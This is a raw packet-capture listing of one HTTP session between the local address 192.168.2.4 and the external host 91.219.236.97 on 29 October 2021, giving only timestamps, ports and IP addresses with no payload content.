Oct 29, 2021 20:50:41.323805094 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.323832035 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.323867083 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.323889017 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.323909044 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.323929071 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.323930025 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.323951960 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.323971987 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.323977947 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.323992968 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.324011087 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.324013948 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.324033976 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.324053049 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.324057102 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.324089050 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.332429886 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.332459927 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.332480907 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.332495928 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.332541943 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.332580090 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.355969906 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.356002092 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.356024981 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.356046915 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.356071949 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.356092930 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.356115103 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.356113911 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.356136084 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.356158018 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.356177092 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.356197119 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.356255054 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.364976883 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.365005970 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.365026951 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.365044117 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.365082979 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.365132093 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.389507055 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.389538050 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.389558077 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.389578104 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.389597893 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.389619112 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.389631033 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.389652014 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.389702082 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.398360968 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.398391008 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.398411989 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.398427963 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.398456097 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.398504972 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.421530962 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.421560049 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.421581030 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.421602964 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.421624899 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.421648026 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.421663046 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.421689987 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.421691895 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.421715021 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.421735048 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.421750069 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.421773911 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.421799898 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.431327105 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.431355953 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.431376934 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.431392908 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.431438923 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.431468010 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.454768896 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.454801083 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.454822063 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.454838037 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.454859018 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.454879999 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.454899073 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.454921007 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.454926014 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.454941988 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.454962015 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.454963923 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.454977989 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.455029964 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.469989061 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.470017910 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.470041037 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.470057011 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.470066071 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.470314980 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.486758947 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.486793041 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.486819029 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.486835003 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.486835957 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.486893892 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.486978054 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.486999989 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.487019062 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.487032890 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.487052917 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.487073898 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.502996922 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.503029108 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.503048897 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.503070116 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.503082991 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.503129005 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.506093025 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.506119967 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.506140947 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.506162882 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.506182909 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.506198883 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.506242037 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.506284952 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.521487951 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.521523952 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.521545887 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.521565914 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.521575928 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.521588087 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.521608114 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.521614075 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.521672010 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.521678925 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.521714926 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.535135031 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.535166025 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.535187960 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.535211086 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.535233021 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.535254002 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.535253048 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.535270929 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.535357952 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.554470062 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.554500103 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.554522038 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.554544926 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.554543018 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.554567099 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.554589033 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.554611921 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.554615021 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.554689884 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.571803093 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.571836948 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.571856022 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.571878910 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.571897030 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.571899891 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.571923018 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.571939945 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.571965933 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.572035074 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.588329077 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.588357925 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.588377953 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.588395119 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.588476896 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.588608980 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.588633060 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.588654041 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.588680029 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.588686943 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.588717937 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.604216099 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.604248047 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.604269028 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.604290009 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.604310989 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.604312897 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.604331970 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.604352951 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.604360104 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.604374886 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.604423046 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.604440928 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.604449034 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.604485989 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.621192932 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.621217966 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.621236086 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.621248007 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.621264935 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.621280909 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.621296883 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.621309042 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.621360064 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.621423006 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.636337042 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.636363983 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.636379957 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.636398077 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.636414051 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.636430025 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.636440039 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.636445999 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.636462927 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.636478901 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.636492014 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.636499882 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.636549950 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.653420925 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.653450966 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.653467894 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.653484106 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.653498888 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.653520107 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.653558016 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.653619051 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.653671026 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.653899908 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.668921947 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.668945074 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.668968916 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.668988943 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.669070959 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.669147015 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.669454098 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.669471025 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.669482946 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.669549942 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.685832977 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.685858011 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.685873985 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.685890913 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.685908079 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.685925007 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.685940027 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.685956955 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.685972929 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.685985088 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.686017990 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.686125994 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.701236010 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.701258898 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.701276064 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.701292038 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.701308966 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.701324940 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.701338053 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.701354980 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.701406956 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.719342947 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.719363928 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.719382048 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.719397068 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.719424009 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.719463110 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.719502926 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.719505072 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.719566107 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.719582081 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.719584942 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.719594955 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.719655991 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.719661951 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.733748913 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.733774900 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.733792067 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.733809948 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.733824968 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.733843088 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.733860016 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.733906984 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.734006882 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.750931025 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.750950098 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.750967026 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.750983953 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.751018047 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.751136065 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.751153946 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.751168013 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.751198053 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.751200914 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.751221895 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.751254082 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.752810001 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.752830029 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.753036976 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.766443968 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.766472101 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.766488075 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.766504049 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.766515970 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.766520977 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.766537905 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.766554117 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.766571045 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.766578913 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.766587973 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.766601086 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.766628981 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.784241915 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.784271002 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.784287930 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.784300089 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.784307003 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.784317017 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.784334898 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.784353018 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.784368038 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.784368992 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.784384012 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.784399986 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.784419060 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.784437895 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.784444094 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.784480095 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.799539089 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.799561024 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.799576044 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.799593925 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.799611092 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.799628019 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.799647093 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.799659014 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.799671888 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.799690962 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.799705029 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.799710989 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.799745083 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.817125082 CEST	80	49865	91.219.236.97	192.168.2.4
